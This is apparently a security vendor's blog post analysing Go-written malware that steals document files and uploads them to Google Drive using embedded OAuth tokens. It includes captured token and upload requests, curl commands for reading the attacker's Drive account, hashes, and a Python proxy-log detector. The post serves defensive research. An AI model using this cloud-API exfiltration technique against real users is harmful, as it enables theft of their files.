Using cloud-based sharing sites is not a new routine for bad guys. Aside from providing free storage for their malicious files, these legitimate sites are used to evade security vendors and researchers.

We have seen malware that has taken advantage of these sites, such as Dropbox, Sendspace, and Evernote. We can now add Google Drive to the list of “abused” sites. We recently came across malware, detected as TSPY_DRIGO.A, that uses Google Drive as one way of siphoning information from its victims.

Access to Google Drive

Once executed, the malware checks certain locations for files of the following types and uploads them to Google Drive:

  • XLSX
  • XLS
  • DOC
  • DOCX
  • PDF
  • TXT
  • PPT
  • PPTX

The locations where the malware checks for files include the Recycle Bin and the User Documents folder.

In order to upload the files to Google Drive, a client_id and client_secret were embedded in the malware, together with a refresh token. Refresh tokens are part of the OAuth 2.0 protocol, which Google Drive uses for authorization; it is the same protocol that lets Twitter, Facebook and other sites act as a login for a different website. An access token is what actually grants access to a Google Drive account. However, access tokens expire, so the refresh token is used to obtain new access tokens.

We decrypted communication from the malware and saw activity such as requests for new tokens and uploading files.

; request for new token

POST /o/oauth2/token HTTP/1.1
Host: accounts.google.com
User-Agent: Go 1.1 package http
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

client_id={REMOVED}apps.googleusercontent.com&client_secret={REMOVED}&grant_type=refresh_token&refresh_token={REMOVED}

;reply for new token

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 14 Oct 2014 08:08:32 GMT
Content-Disposition: attachment; filename="sample.txt"; filename*=UTF-8''sample.txt
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alternate-Protocol: 443:quic
Transfer-Encoding: chunked

{
"access_token" : "{REMOVED}",
"token_type" : "Bearer",
"expires_in" : 3600
}

;upload file

POST /upload/drive/v2/files?alt=json&uploadType=multipart HTTP/1.1
Host: www.googleapis.com
User-Agent: google-api-go-client/0.5
Content-Length: 398
Authorization: OAuth {REMOVED}
Content-Type: multipart/related; boundary=e0cee80c4f3d21e18e77548a60b374408ce65bc3b76c5de1cdbe2afe7eeb
Accept-Encoding: gzip
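The token-then-upload sequence in the captured traffic is also what a defender can look for in proxy logs. The following is an added example, not code from the original post: it parses constructed proxy log lines (assumed format: timestamp, client IP, method, host, path, user-agent) and flags clients that hit the OAuth token endpoint with the Go HTTP user-agents seen above and then POST to the Drive upload endpoint within a short window.

```python
import re
from datetime import datetime, timedelta

# Constructed proxy log lines (not from the original post). Fields: timestamp,
# client IP, method, host, path, user-agent (rest of line). Client 10.0.0.7 shows
# the TSPY_DRIGO.A sequence: token POST from the "Go 1.1 package http" UA, then a
# multipart Drive upload a second later; its 09:30 upload falls outside WINDOW.
SAMPLE_LOG = """\
2014-10-14T08:07:55Z 10.0.0.5 GET accounts.google.com /ServiceLogin Mozilla/5.0
2014-10-14T08:08:32Z 10.0.0.7 POST accounts.google.com /o/oauth2/token Go 1.1 package http
2014-10-14T08:08:33Z 10.0.0.7 POST www.googleapis.com /upload/drive/v2/files?alt=json&uploadType=multipart google-api-go-client/0.5
2014-10-14T08:09:01Z 10.0.0.9 POST www.googleapis.com /upload/drive/v2/files?uploadType=multipart Mozilla/5.0
2014-10-14T09:30:00Z 10.0.0.7 POST www.googleapis.com /upload/drive/v2/files?uploadType=multipart google-api-go-client/0.5
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (.*)$")
GO_UA_RE = re.compile(r"^(Go \d|google-api-go-client/)")  # the two UAs in the capture
WINDOW = timedelta(minutes=5)  # assumed pairing window; tune to your environment

def parse_line(line):
    """Split one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, method, host, path, ua = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "ip": ip,
            "method": method, "host": host, "path": path, "ua": ua}

def is_token_request(r):
    # grant_type=refresh_token sits in the POST body, which proxy logs rarely keep,
    # so the token endpoint plus a non-browser UA is the usable signal here.
    return (r["method"] == "POST" and r["host"] == "accounts.google.com"
            and r["path"] == "/o/oauth2/token")

def is_drive_upload(r):
    return r["method"] == "POST" and r["host"] == "www.googleapis.com" and r["path"].startswith("/upload/drive/")

def find_suspects(log_text):
    """{ip: [(token_ts, upload_ts)]} for a Go-client token fetch followed by a Drive upload within WINDOW."""
    recs = sorted((r for r in map(parse_line, log_text.splitlines()) if r),
                  key=lambda r: r["ts"])
    last_token, suspects = {}, {}
    for r in recs:
        if is_token_request(r) and GO_UA_RE.match(r["ua"]):
            last_token[r["ip"]] = r["ts"]
        elif is_drive_upload(r) and r["ip"] in last_token:
            if r["ts"] - last_token[r["ip"]] <= WINDOW:
                suspects.setdefault(r["ip"], []).append((last_token[r["ip"]], r["ts"]))
    return suspects
```

Only 10.0.0.7 is flagged: the browser-driven upload from 10.0.0.9 and the later, unpaired upload from 10.0.0.7 are left alone.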

We used this same approach to check the files uploaded to the Google Drive account. As of this writing, some of the files are still “active” or present in the account. We also found that the file names reveal the targeted entities, which are mostly government agencies.

Below is the command line used for testing:

;Request new token
curl -d "client_id={CLIENT_ID}&client_secret={SECRET_KEY}&grant_type=refresh_token&refresh_token={REFRESH_TOKEN}" https://accounts.google.com/o/oauth2/token

;List files
curl -H "Authorization: OAuth {ACCESS_TOKEN}" "https://www.googleapis.com/drive/v2/files?maxResults=1"

Here’s an excerpt of the log from the Google Drive account on one of the files uploaded:

{
"kind": "drive#file",
...
"title": "{HOSTNAME} C:\\Users\\{USERNAME}\\AppData\\Roaming\\{REMOVED}長致詞{REMOVED}.doc",
"mimeType": "application/vnd.google-apps.document",
...
},
"createdDate": "2014-10-16T10:13:14.339Z",
"modifiedDate": "2014-10-16T10:13:16.286Z",
"modifiedByMeDate": "2014-10-16T10:13:16.286Z",
"lastViewedByMeDate": "2014-10-16T10:13:16.286Z",
"markedViewedByMeDate": "1970-01-01T00:00:00.000Z",
...
}

The Other Google Connection

Use of Google Drive isn’t the only thing that connects this malware to Google. The malware was actually created using the Go programming language, commonly known as golang. This is an open source programming language that was initially developed by Google. According to Google, “the goals of the Go project were to eliminate the slowness and clumsiness of software development at Google, and thereby to make the process more productive and scalable.”

While interesting, the use of golang is not new; security researchers have seen golang-created malware as early as 2012. It would be hard to pinpoint the exact reason for using golang but some have attributed its appeal to its supposed lack of mainstream profile.

Gathering Information

Our analysis shows that this malware can only upload document-type files to Google Drive. This kind of routine is well suited to reconnaissance, one of the earlier stages of a targeted attack. After all, one of the key aspects of a successful attack is having enough information on the target: the more information attackers can gather, the more attack vectors they can use against their target.

The following hashes are related to this attack:

  • 2C32674B334F10000CB63ED4BA4EE543A16D8572
  • 2D98DDF8F5128853DD33523BCBBD472B8D362705

Trend Micro secures enterprises via its Custom Defense solution that provides advanced threat protection by performing network-wide monitoring to detect zero-day malware, malicious communications, and attacker behaviors invisible to standard solutions.

We have already notified Google about this incident.

With additional insight from Ronnie Giagone, Dove Chiu, and Vico Fang.

Source: http://blog.trendmicro.com/trendlabs-security-intelligence/targeted-attacks-stealing-information-through-google-drive/